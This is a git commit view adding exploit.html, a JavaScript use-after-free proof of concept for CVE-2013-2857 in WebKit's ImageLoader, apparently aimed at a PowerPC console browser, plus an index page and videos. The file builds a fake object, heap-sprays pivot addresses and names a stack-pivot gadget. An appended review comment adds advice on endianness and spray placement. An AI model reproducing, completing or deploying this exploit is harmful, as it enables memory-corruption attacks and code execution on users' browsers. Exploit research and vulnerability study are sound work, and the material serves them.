
Initial commit

Winbagility 1 year ago
commit
6e6d575e06
5 changed files with 75 additions and 0 deletions
  1. BIN
      diibugger.mp4
  2. 64
    0
      exploit.html
  3. BIN
      illuminati.mp4
  4. 11
    0
      index.html
  5. BIN
      tcpgecko.mp4

BIN
diibugger.mp4 View File


+ 64
- 0
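--- a/exploit.html
+++ b/exploit.html
@@ -0,0 +1,64 @@
+<!--
+Tested on 5.5.1
+CVE-2013-2857
+Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
+Result: Bug is present, crash on what is presumably render
+-->
+<script>
+function UaF(a)
+{	
+    var pivotAdressAdress       = 0x1B000000; //r6
+    var pivotAdress             = 0x41414140; //0x0101cd80; //mr r1,r11; blr
+    var sizeWebCoreImageLoader  = 0x18;
+    var sprayCount              = 2000;
+    var _4K                     = 0x1000;
+    
+	//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
+    a.type="radio";
+	
+	//Allocate this new WebCore::ImageLoader over freed WebCore::
+    var ab = new ArrayBuffer(sizeWebCoreImageLoader);
+    var dv = new DataView(ab)
+
+    /*
+    0:000:x86> dt webkit!WebCore::ImageLoader
+       +0x000 __VFN_table : Ptr32 
+       +0x004 m_client         : Ptr32 WebCore::ImageLoaderClient
+       +0x008 m_image          : WebCore::CachedResourceHandle<WebCore::CachedImage>
+       +0x00c m_failedLoadURL  : WTF::AtomicString
+       +0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
+       +0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
+       +0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
+       +0x010 m_imageComplete  : Pos 3, 1 Bit
+       +0x010 m_loadManually   : Pos 4, 1 Bit
+       +0x010 m_elementIsProtected : Pos 5, 1 Bit
+    */
+    //Register:r3 Adress:0x1AF35330-0x1AF35360
+    dv.setUint32(0x00, 0x41414141);         //vtable
+    dv.setUint32(0x04, pivotAdressAdress);  //m_client
+    dv.setUint32(0x08, 0x00000000);         //m_image, must be NULL
+    dv.setUint32(0x0C, 0x42424242);         //m_failedLoadURL
+    dv.setUint32(0x10, 0x43434343);         //m_hasPendingBeforeLoadEvent
+    dv.setUint32(0x14, 0x44444444);         //padding
+	
+    //Spray large ArrayBuffer with pivotAdress	
+    //Middle range 0x1B000000
+    var ar = new Array(sprayCount);
+    for(var i=0; i<sprayCount; i++){
+        ar[i] = new DataView(new ArrayBuffer(_4K));
+        for(var j=0; j<_4K; j+=4){
+            ar[i].setUint32(j, 0x99999999); //filler
+        }
+        ar[i].setUint32(0x24, pivotAdressAdress);   //lwz r31, 0x24(r6)
+                                                    //...
+        ar[i].setUint32(0x00, pivotAdressAdress);   //lwz r7, 0x0(r31)
+        ar[i].setUint32(0xEC, pivotAdress);         //lwz r9, 0xEC(r7)
+    }
+    
+    
+	//Use the new WebCore::ImageLoader & pivot !
+	return 0;
+}
+</script>
+
+<input id="x" type="image" onerror="UaF(this);" src=""/>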
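Review bot: The file is a crash proof-of-concept rather than a working exploit, and the code should say so explicitly: the fake object's vtable is `dv.setUint32(0x00, 0x41414141)`, `pivotAdress` is the marker `0x41414140` with the real gadget `0x0101cd80; //mr r1,r11; blr` left commented out, and `UaF` simply does `return 0;` after the "Use the new WebCore::ImageLoader & pivot !" comment — a one-line note such as `// Crash PoC only: vtable/pivot are 0x4141... fault markers; the mr r1,r11 gadget is not wired up` above `function UaF(a)` would stop a reader taking the pivot comments at face value. Two caveats a practitioner needs in the spray loop: every `setUint32` call omits the littleEndian flag and therefore writes big-endian, which fits the big-endian PowerPC target the `r6`/`r31`/`lwz` comments suggest but will byte-swap silently if this is ported to a little-endian browser, and the whole chain assumes the 2000 × 4 KiB spray places a buffer exactly at `0x1B000000` with the `0x00`/`0x24`/`0xEC` slots at the expected offsets, which nothing verifies before `m_client` is pointed there. "Tested on 5.5.1" also names no product; state which browser or firmware build that version refers to.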

BIN
illuminati.mp4 View File


+ 11
- 0
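--- a/index.html
+++ b/index.html
@@ -0,0 +1,11 @@
+
+<center>
+<a href="illuminati.mp4"><h1>Illuminati</h1></a><br/>
+<a href="diibugger.mp4"><h1>Diibugger</h1></a><br/>
+<a href="exploit.html"><h1>Exploit</h1></a><br/>
+<br/>
+<br/>
+<br/>
+<br/>
+<a href="tcpgecko.mp4"><h1>TCPGecko</h1></a><br/>
+</center>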

BIN
tcpgecko.mp4 View File